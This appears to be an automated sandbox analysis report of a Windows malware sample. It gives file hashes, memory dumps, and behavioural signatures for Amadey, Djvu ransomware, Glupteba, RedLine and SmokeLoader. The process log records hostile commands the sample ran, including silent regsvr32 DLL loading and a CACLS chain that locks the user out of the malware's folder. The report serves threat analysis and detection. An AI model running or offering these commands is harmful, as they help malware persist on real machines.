memory/2532-126-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1480-125-0x00000000025B0000-0x00000000029A8000-memory.dmp

memory/1480-128-0x00000000025B0000-0x00000000029A8000-memory.dmp

memory/1480-129-0x00000000029B0000-0x000000000329B000-memory.dmp

memory/1480-130-0x0000000000400000-0x0000000000D6F000-memory.dmp

memory/1860-131-0x0000000000060000-0x000000000006C000-memory.dmp

memory/1860-132-0x0000000000060000-0x000000000006C000-memory.dmp

memory/1860-133-0x0000000000400000-0x0000000000D6F000-memory.dmp

\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/2784-138-0x0000000000150000-0x00000000001C5000-memory.dmp

memory/2784-137-0x00000000000E0000-0x000000000014B000-memory.dmp

memory/2532-139-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2784-140-0x00000000000E0000-0x000000000014B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/2336-142-0x0000000001DC0000-0x0000000001E52000-memory.dmp

\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/2336-154-0x0000000001DC0000-0x0000000001E52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/1980-166-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1980-167-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1980-171-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1980-170-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1480-168-0x0000000000400000-0x0000000000D6F000-memory.dmp

memory/2784-169-0x00000000000E0000-0x000000000014B000-memory.dmp

memory/1980-173-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1980-175-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1320-177-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1980-181-0x0000000000400000-0x000000000043E000-memory.dmp

memory/2520-179-0x0000000005080000-0x00000000050C0000-memory.dmp

memory/1980-178-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1480-182-0x00000000025B0000-0x00000000029A8000-memory.dmp

memory/1480-183-0x00000000029B0000-0x000000000329B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabCA13.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9b5a426a726f758115ea77db8fac5e82
SHA1 9245b9f3edb46fc9ef6fd87b3ae7a0ec52399345
SHA256 bcb370ca3e638e8a06c2122b3786140e21e0e8ec801e6b0402733a4182656aee
SHA512 9019bd7861bec7ccd2979fa8792cd65eb7aa0f1737ce0c372a39dcf4940cccc3893e8bf9780bdef7760aa38ed3189ca5c53bed0df5d71df1d9c1671df6705385

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 0eabcbc7345ebf33e9de3c443923ea07
SHA1 5d0afb56e8ceacff9bd5a13c831ecdbc38192f23
SHA256 89906f810de938045610b1fd48c1993ef7571c0270285ed6ef1f038908dabda9
SHA512 87edc532180e200cf2b7861d2920db1044ad38ed0367777cd19536c5b393d02578c0e6548dfcfd79a947528c12e6e2120a1c399106aaff010fe92b8932c28986

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 0268ef551139ac7672a96e6658ce044a
SHA1 b005ca526faa872c8e0aeafd11e3335c28c16037
SHA256 417ec67ee533de68e2008cc547552d33878e0d9bedd6ceaf5572d37112bb036a
SHA512 5405872c99f9f88596d39057d8701ba360b498d8bbb5eb64cd5af5f8f1100e0ecdaf09ad811aa0b3fc92ddfcef05d1a14e6495868e4995af049cd3be0247860d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 d52f0c3ce546cde61703a1b1b8fcca6a
SHA1 4ffe15c2ae6b48606b7dc6b5d3051a73be04f2db
SHA256 f3ea7e39f0a39b53e2b282dd3d2a32756bb3b69150e41ad67d4020e19204ec92
SHA512 9c48b9abe5bfcc43f6b4e700b1e62ed4d83490c16c7dd69d49ebc4ee8080b3ca08601d67b363749e0247d97bca7fc6fd941d750d92427cdfc9d6a239d06bc0e5

memory/1860-199-0x0000000000400000-0x0000000000D6F000-memory.dmp

memory/1320-202-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1980-203-0x0000000074C00000-0x00000000752EE000-memory.dmp

memory/2520-205-0x0000000005080000-0x00000000050C0000-memory.dmp

memory/1980-207-0x0000000074C00000-0x00000000752EE000-memory.dmp

memory/1980-210-0x0000000007320000-0x0000000007360000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4272.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

memory/2520-213-0x0000000000490000-0x00000000004AC000-memory.dmp

memory/1320-214-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1320-215-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2520-216-0x0000000000490000-0x00000000004A5000-memory.dmp

memory/2520-219-0x0000000000490000-0x00000000004A5000-memory.dmp

memory/2520-217-0x0000000000490000-0x00000000004A5000-memory.dmp

memory/2520-221-0x0000000000490000-0x00000000004A5000-memory.dmp

memory/2520-223-0x0000000000490000-0x00000000004A5000-memory.dmp

memory/2520-225-0x0000000000490000-0x00000000004A5000-memory.dmp

memory/2520-240-0x00000000004C0000-0x00000000004C1000-memory.dmp

memory/2712-252-0x0000000074C00000-0x00000000752EE000-memory.dmp

memory/2712-251-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2520-253-0x0000000005080000-0x00000000050C0000-memory.dmp

memory/2712-254-0x0000000002410000-0x0000000002450000-memory.dmp

memory/2520-256-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-257-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-258-0x00000000759A0000-0x0000000075AB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4272.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

\Windows\rss\csrss.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

C:\Windows\rss\csrss.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

C:\Windows\rss\csrss.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

C:\Users\Admin\AppData\Local\Temp\Tar4442.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 7ca1c62f562ccca914a8890091b90a43
SHA1 9983014fe48f89f44ec634fab0a290df1bc88fb7
SHA256 10b7fdd7477b1a6329d4c65d8d91bdfb4224dbeb904a958b9baf40e75660bf08
SHA512 4b27fcc2b3754328c1beed8b8816312cc4b9efa458cd26ca155943e21fd633282564bb2647dabde67b3aad3c56a412eb2068fa0bbfaacb817bbbea2310772729

\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 cb666f7e514673ecc3185691ee8ff894
SHA1 72e4f07ba2adeb22e9924cc567c6a4a4c22ade5a
SHA256 46af5c4a4bdf2fa33d9f78df3f1867c53360484be50f51190f10acd13e0b1f9a
SHA512 abd9bb6fc37d5a454a58e3b9f383cfd5f70e0eff22f462553b32d74f9a9b6f8de068e470ee83c4d7d16830b6dfbfc0145ee3b2b9eeebd3af46fef8b564df1ae9

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-17 16:49

Reported

2023-10-17 16:53

Platform

win10v2004-20230915-en

Max time kernel

43s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe"

Signatures

Amadey

trojan amadey

Detected Djvu ransomware

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Glupteba payload

RedLine

infostealer redline

RedLine payload

SmokeLoader

trojan backdoor smokeloader

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44D5.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44D5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44D5.exe N/A

Deletes itself

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\System32\powercfg.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Themida packer

themida

UPX packed file

upx

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\44D5.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\44D5.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3764 set thread context of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3144 wrote to memory of 3764 N/A N/A C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3144 wrote to memory of 3764 N/A N/A C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3144 wrote to memory of 3764 N/A N/A C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3144 wrote to memory of 3712 N/A N/A C:\Users\Admin\AppData\Local\Temp\44D5.exe
PID 3144 wrote to memory of 3712 N/A N/A C:\Users\Admin\AppData\Local\Temp\44D5.exe
PID 3144 wrote to memory of 3712 N/A N/A C:\Users\Admin\AppData\Local\Temp\44D5.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3764 wrote to memory of 864 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\40DC.exe
PID 3144 wrote to memory of 3724 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3144 wrote to memory of 3724 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3144 wrote to memory of 1832 N/A N/A C:\Users\Admin\AppData\Local\Temp\497B.exe
PID 3144 wrote to memory of 1832 N/A N/A C:\Users\Admin\AppData\Local\Temp\497B.exe
PID 3144 wrote to memory of 1832 N/A N/A C:\Users\Admin\AppData\Local\Temp\497B.exe
PID 3724 wrote to memory of 4300 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3724 wrote to memory of 4300 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3724 wrote to memory of 4300 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe"

C:\Users\Admin\AppData\Local\Temp\40DC.exe

C:\Users\Admin\AppData\Local\Temp\40DC.exe

C:\Users\Admin\AppData\Local\Temp\44D5.exe

C:\Users\Admin\AppData\Local\Temp\44D5.exe

C:\Users\Admin\AppData\Local\Temp\40DC.exe

C:\Users\Admin\AppData\Local\Temp\40DC.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\4812.dll

C:\Users\Admin\AppData\Local\Temp\497B.exe

C:\Users\Admin\AppData\Local\Temp\497B.exe

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\4812.dll

C:\Users\Admin\AppData\Local\Temp\517A.exe

C:\Users\Admin\AppData\Local\Temp\517A.exe

C:\Users\Admin\AppData\Local\Temp\566D.exe

C:\Users\Admin\AppData\Local\Temp\566D.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"

C:\Users\Admin\AppData\Local\Temp\6042.exe

C:\Users\Admin\AppData\Local\Temp\6042.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\icacls.exe

